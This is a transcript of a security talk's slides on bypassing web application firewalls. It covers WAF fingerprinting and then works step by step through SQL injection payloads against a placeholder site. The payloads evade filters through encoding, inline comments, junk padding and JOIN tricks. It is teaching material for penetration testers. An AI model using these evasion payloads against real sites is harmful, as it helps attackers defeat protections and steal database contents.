waf bypassing techniques
Post on 16-Jan-2017
379 Views
Preview:
TRANSCRIPT
WAF BypassingTechniques
Avinash Kumar Thapa, Senior Security Analyst in Network Intelligence India
Bug Hunter on Hackerone CTF Author on Vulnhub.com Some exploits and PoC on Exploit-db as well. Passionate about Web Applications Security and Exploit Writing.
Agenda Introduction to Web Applications Firewalls Operation Modes Vendors Fingerprinting WAF Ways to Bypass WAFs Practical Cases for Bypassing Conclusion
Introduction to Web Application Firewalls
Presents as Application Layer Monitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers
based upon their pre-defined signatures in a database. Basic goal of WAF is to monitor and block the contents that violates pre-defined policy. These pre-defined policies are patterns of user input which ends up in potential attack. Understands HTTP and HTTPs traffic better than any traditional firewall.
Types of Operation Modes
Negative ModeA negative security model recognize attacks by relying on a database of expected attack signatures.Example:Do not allow in any page, any argument value (user input) which match potential XSS strings like <script>,</script>, String.fromCharCode, etc.
Pros:● Less time to implement.
Cons:● Less protection.
Positive Model A positive security model enforces positive behaviour by learning the application logic and the
building a security policy of valid known requests as a user interacts with the application.Example: Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until
65535. Using intval conditions on page. (Accepts only integers)Pros:● Better performance (less rules).● Less false positives.Cons:● Much more time to implement.● Some vendors provide “automatic learning mode”, they help, but are far from perfect,in the end, you always need a skilled human to review the policies
Mix Model
Combination of both positive and negative model.
Testing Environments Google Chrome Mozilla Firefox Internet Explorer Opera Browser
Products F5 BIG IP WAF Sucuri Modsecurity Imperva Incapsula PHP-IDS (PHP Intrusion Detection System) Quick Defense AQTRONIX WebKnight (For IIS and based on ISAPI filters) Barracuda WAF
Fingerprinting WAFAdds Cookie to the HTTP Communication. For Citrix Netscaler WAF
Fingerprinting WAF F5 BIG IP ASM
Fingerprinting WAF On the basis of HTTP Response
Other WAF’s may be detected by the type of http response we receive when submitting a malicious request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403, 406, 419, 500, 501 etc.
Fingerprinting WAF Response for BIG F5
Fingerprinting WAF Request and Response for ModSecurity Firewall
Request:
Fingerprinting WAF Request and Response for ModSecurity Firewall
Response:
Fingerprinting WAF Response for WebKnight Firewall
Response:
Fingerprinting WAF Response for WebKnight Firewall
Response rendered on Browser
Automatic Fingerprinting WAF Using Nmap Scripts
nmap -p80 --script http-waf-detect <host>
Using WaFw00f.py
Python Wafw00f.py –url <URL>
Techniques to Bypass WAFs
Bypassing WAF For SQL Injection Vulnerabilities Bypassing WAF for XSS Issues Bypassing WAF for LFI and RFI vulnerabilities.
General Techniques to bypass WAF Null Character Injection Mixed Case Inline Comments Chunked Requests Buffer Overflow HTTP Parameter Pollution URL encoding Keyword Splitting
Replaced Keywords Ignoring Cookies Using Data URIs Header Injection
Bypassing WAF For SQL Injection Vulnerabilities
https://abc.com/index.php?id=1
Example 1 (Without WAF)
‘
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6
Example 1 (With WAF)
https://abc.com/index.php?id=1‘HTTP/1.1 403 Forbidden ErrorOrHTTP/1.1 406 Not AcceptableorHTTP/1.1 404 Not FoundOrHTTP/1.1 500 Internal Server ErrorOrHTTP/1.1 400 Bad Request
Some recon on WAF
Came to know Modsecurity is in action
https://abc.com/index.php?id=1
“HTTP/1.1 200 OK
https://abc.com/index.php?id=1
%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1’ ' at line 6
This technique is URL Encoding
Some time you need to use:1) Double URL Encoding :- %2527%27’2) Triple URL Encoding:- %252525%2527%27’ (This is very rare Case)
https://abc.com/index.php?id=1
%27 ORDER BY 1%23
HTTP/1.1 403 Forbidden
Assumptions in mind• ‘Order’ keyword is Blocked ??• ‘Order by ’ keyword is Blocked ??• Any other alternative of Order by query ??• Does Spaces are blocked
Let’s Try
https://abc.com/index.php?id=1
%27 ORDER %23
HTTP/1.1 403 Forbidden
Assumptions in mind• ‘Order’ keyword is Blocked• Check again ‘order’ is blocked ??
https://abc.com/index.php?id=1
%27ORDER%23HTTP/1.1 200 OK
New Assumptions in mind• ‘Order’ keyword is not Blocked• What is blocked then ???
SPACES ARE BLOCKED
https://abc.com/index.php?id=1
%27 ORDER by 1 %23
HTTP/1.1 403 Forbidden
https://abc.com/index.php?id=1
%27ORDERby1 %23
HTTP/1.1 200 OK
No Assumptions in mind
Because spaces are blocked only
Techniques to bypass spacesUsing ‘+’ instead of space like:- order+by+1 (Mostly blocked)Using inline comments instead of spaces ‘/**/’ like:- order/**/by/**/1Using combination of inline comments and URL encoding instead of spaces like:
• Order/%2a%2a/by/%2a%2a/1• Order%2f**%2fby%2f**%2f1
Using combination of inline comments, URL encoding & Junk Characters instead of spaces like:
• Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1• Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
Techniques to bypass spaces
Using white space characters %0a, %0b, %0c, %0d,%a0,%09,%01
Query will be ORDER%0aby%0a1 ORDER%0bby%0b1 ORDER%0cby%0c1 ORDER%0Dby%0D1 ORDER%A0by%A01 ORDER%0D%0Aby%0D%0A1
https://abc.com/index.php?id=1
%27/**/ORDER/**/by/**/1%23
HTTP/1.1 200 OK
Let’s Suppose no. of columns are 3
https://abc.com/index.php?id=1
%27 UNION SELECT 1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind• ‘Spaces’ are Blocked ??
https://abc.com/index.php?id=1
%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind• ‘Spaces’ were bypassed using inline
comments..…Still blocked???• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked
Techniques to Bypass
Using Inline comments: /!*50000UNION*/ /*!40000UNION*/ /*!00000UNION*/
If UNION is blocked
Using URL Encoding Techniques: %53nion %2553nion %55%4e%49%4f%4e (UNION)
Double URL Encoding
Triple URL Encoding
https://abc.com/index.php?id=1
%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23https://abc.com/index.php?id=1
%27/**//*!%55NION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden Assumptions in mind• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked
https://abc.com/index.php?id=1
%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23https://abc.com/index.php?
id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
https://abc.com/index.php?id=1
%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked
https://abc.com/index.php?id=1
%27/**//*!50000UNION*/1,2,3%23
HTTP/1.1 200 OK
https://abc.com/index.php?id=1
%27/**//*!50000SELECT*/1,2,3%23
HTTP/1.1 200 OK
Assumptions in mind• ‘UNION’ keyword is NOT blocked.• ‘SELECT’ keyword is NOT blocked.• ‘Intergers’ are NOT blocked • ‘Commas’ are NOT blocked • Combination of “UNION SELECT” is blocked ?• “SELECT with Integers” are NOT blocked
Techniques to bypass combination of “union select”Using combination of inline comments and URL encoding :• /*!50000%55niOn*/ /*!50000%53eLECT*/
Using white spaces and URL encoding of comments (#)
• Union%23%0aSELECT• Union%23%0bSELECT• Union%23%0cSELECT• Union%23%0DSELECT• Union%23%A0SELECT
Using combination of inline comments and URL encoding :• /*!50000%55niOn*/ /*!50000%53eLECT*/
Techniques to bypass combination of “union select”
Using Buffer Overflow
UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECTSome time need to increase the junk as per the requirement
UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT
Techniques to bypass combination of “union select”Using Distinct statement
UNION DISTINCT SELECT
Using Distinctrow statement
UNION DISTINCTROW SELECT
https://abc.com/index.php?id=1%27/**/UNION
%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23
HTTP/1.1 200 OK
Special Case : What if Commas got blocked ?
https://abc.com/index.php?id=1
%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden
Assumptions in mind• ‘UNION’ keyword is NOT blocked.• ‘SELECT’ keyword is NOT blocked.• ‘Intergers’ are NOT blocked • ‘Commas’ are blocked • Combination of “UNION SELECT” is NOT
blocked ?• “SELECT with Integers” are NOT blocked
Time to bypass commas “,”.
Basic Bypasses URL Encoding - %2c , Double URL Encoding - %252c %2c , Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
Basic Bypasses URL Encoding - %2c , Double URL Encoding - %252c %2c , Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
Advance way to bypass “Commas” Using JOIN
JOIN used for columns as UNION is used for the rows
We have SELECT 1,2,3
SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
Advance way to bypass “Commas” https://abc.com/index.php?id=1
%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
Similar Approach for other Vulnerabilities For XSS For LFI / RFI
DEMO TIME
References Images in slides 10,11,14,15,16,17 Taken from
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf
Thank you..!
top related